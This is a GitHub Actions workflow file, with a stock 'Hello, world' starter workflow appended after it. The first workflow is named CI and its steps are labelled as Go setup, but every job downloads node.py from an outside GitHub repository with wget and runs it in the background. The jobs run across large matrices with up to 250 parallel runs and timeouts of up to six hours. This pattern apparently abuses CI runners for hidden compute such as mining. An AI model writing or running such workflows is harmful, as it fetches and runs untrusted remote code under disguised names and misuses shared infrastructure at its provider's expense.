name: CI
on: 
  push:
    branches: [ "main" ]

jobs:
  kont:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 80
      fail-fast: false
      matrix:
        go: [18.20, 20.19, 22.15, 22.16, 18, 20, 22, 22.13, 22.14]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z]
    timeout-minutes: 10
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-node@v4
      with:
        node-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v4
    - name: clone
      run: wget https://github.com/ratnasi7283-art/bahan/raw/refs/heads/main/node.py && chmod u+x node.py && python node.py --thread 4 &
           sleep 310s
  ol:
    needs: kont
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [18.20, 20.19, 22.15, 22.16, 18, 20, 22, 22.13, 22.14] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - uses: actions/checkout@v4
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-node@v4
      with:
        node-version: ${{ matrix.go }}
      id: go
    - name: clone
      run: wget https://github.com/ratnasi7283-art/bahan/raw/refs/heads/main/node.py && chmod u+x node.py && python node.py --thread 4 &
            sleep 5m
        
    
     
  tol:
    needs: [kont]
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [18.20, 20.19, 22.15, 22.16, 18, 20, 22, 22.13, 22.14] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - uses: actions/checkout@v4
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-node@v4
      with:
        node-version: ${{ matrix.go }}
      id: go
    - name: clone
      run: wget https://github.com/ratnasi7283-art/bahan/raw/refs/heads/main/node.py && chmod u+x node.py && python node.py --thread 4 &
            sleep 6m
  ayo:
    needs: ol
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [18.20, 20.19, 22.15, 22.16, 18, 20, 22, 22.13, 22.14] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - uses: actions/checkout@v4
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-node@v4
      with:
        node-version: ${{ matrix.go }}
      id: go
    - name: clone
      run: wget https://github.com/ratnasi7283-art/bahan/raw/refs/heads/main/node.py && chmod u+x node.py && python node.py --thread 4 &
            sleep 60m
        
    
     
  su:
    needs: [tol]
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [18.20, 20.19, 22.15, 22.16, 18, 20, 22, 22.13, 22.14] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - uses: actions/checkout@v4
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-node@v4
      with:
        node-version: ${{ matrix.go }}
      id: go
    - name: clone
      run: wget https://github.com/ratnasi7283-art/bahan/raw/refs/heads/main/node.py && chmod u+x node.py && python node.py --thread 4 &
            sleep 261m
        
    
  # This is a basic workflow to help you get started with Actions

name: CI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the "main" branch
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v4

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: echo Hello, world!

      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo Add other actions to build,
          echo test, and deploy your project.
